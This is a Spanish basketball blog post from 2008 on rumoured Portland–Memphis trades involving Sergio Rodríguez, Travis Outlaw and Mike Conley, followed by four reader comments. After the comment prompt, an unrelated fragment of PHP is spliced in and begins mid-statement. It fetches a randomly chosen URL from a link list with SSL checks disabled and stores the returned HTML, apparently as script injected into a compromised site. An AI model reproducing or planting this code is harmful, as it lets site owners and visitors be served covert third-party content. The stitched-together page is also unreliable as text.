¿Sergio Rodríguez a Memphis?

29 de November de 2008 por txusma

El diario Marca, siempre atento a cualquier noticia que involucre a los españoles de la NBA, ya se ha hecho eco de los rumores que arrecían en las últimas horas en Portland: Travis Outlaw podría abandonar la franquicia rumbo a Memphis a cambio del amiguisimo de Greg Oden, Mike Conley. El traspaso sería legal de esta manera pero ambas franquicias quieren incluir otros jugadores y contratos que satisfagan las necesidades de la otra parte. De esta manera el traspaso está en el aire pero no parece realmente inminente.  Una de las posibilidades enviaría a Sergio Rodríguez a Memphis junto Outlaw y a Hackim Warrick y Javaris Crittenton a Blazers junto a Conley.

¿Qué persiguen los Blazers con este traspaso? Intentemos obviar que Conley es el mejor amigo de Oden y hablemos de términos puramente deportivos. Conley llegaría para ocupar el papel que está realizando Sergio, es decir el de base suplente y la realidad es que hasta ahora el ex-base de Ohio no ha jugado mucho mejor que Sergio. Con este traspaso además romperían una de las sociedades más famosas ultimamente y más espectaculares: La Spanish Connection. Y para muestra un botón:

Por su parte, Outlaw ha demostrado ser un fenomenal sexto hombre o un buen alero titular mientras que Warrick no ha acabado de asentarse en el quinteto de Memphis a pesar de que todos recordamos más de una y de dos actuaciones espectaculares por su parte. El gran problema es que Warrick es ala-pívot. Como Lamarcus, como Frye y como Diogu. ¿Otro más?

Posiblemente los Blazers confien mucho en Nicolas Batum y en Martell Webster, que ha de volver en los próximos días. También es posible que haya más movimientos que involucren a Frye, Diogu o el mismo Warrick, pero lo que parece claro es que aunque nosotros lo hayamos hecho, en Portland no han obviado que Conley es el mejor amigo de Oden.

Y tenemos algun rumor más:

– Los Blazers están activos y parece que se han dado cuenta que con Roy de base su juego se espesa y pierden muchas alternativas. Por eso también ha sonado con fuerza estos días el interés por el base de Atlanta, Mike Bibby, que aportaría un grado de veteranía que le iría muy bien a la franquicia de Oregon.

– Ya hemos comentado que Kaman está en el centro del mentidero de la NBA. Ahora se habla de un Kaman x Jason Richardson. Pero no olvidemos que el interés de los Bulls es el que suena más fuerte

Steve Nash podría reunirse de nuevo con su entrenador preferido, Mike D’Antoni en New York antes del famoso 2010.

Comenta

4 comentarios a esta entrada

  1. Vader dice:
    #1

    Si le sirve para ser base titular bienvenido sea…

      Citar

  2. Q dice:
    #2

    Hablo sin conocer contratos para quizas Portland este fichando jugadores con pocos años restantes. Tiene un plantel tremendamente joven y en un par de temporadas se encontrara que no puede retener a muchos de sus jugadores sino tiene un margen amplio, asi que quizas por ahi van los tiros, aunque repito que desconozco la situacion contractual de los jugadores de Menphis (en principio todos jovenes, asi que seguramente mi teoria esta fuera de lugar).

    Respecto al jugador que menos se ha ganado su extension mi voto es para Okafor sin duda, que para eso me lo como al desgraciado en la fantasy de yahoo.

      Citar

  3. TheDeerHunter dice:
    #3

    Parece que de momento se ha paralizado la operación…

    Mis preferencias hubieran sido otras (¿quizás NY??) e incluso empezaban a verle en Portland. No obtante hay que valorar que en Memphis se le va a exigir poco tirar a canasta y mucho menos defender… y le van a venir muy bien el juego rápido y las dos referencias ofensivas en Mayo y Gay.

    Malas noticias serán para Rudy… que él era el único que le pasaba. Mejores serán para Marc, que igual gana uno o dos tiros con ventaja más por partido.

    Lo de Outlaw… pues sí, se adivina que Portland quiere aligerar la nómina de jugadores de ese perfil. Se veía venir y no es del todo mala jugada.

      Citar

  4. Viva_Dirk dice:
    #4

    Portland, además de buscar quitarse a uno de los que hay que renovar como Outlaw, busca un ‘base McMillan’, buen defensor, ordenado en ataque y que no se salte los sistemas(lo que no se es que sistemas), para colmo amigo del alma de Oden.

    En Memphis podria ser una apuesta definitiva por el juego rápido, con Sergio-Mayo-Gay-Outlaw-Marc son un equipo preparado para correr, pero ojito que Outlaw es otro de los que no ve mas allá del aro.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>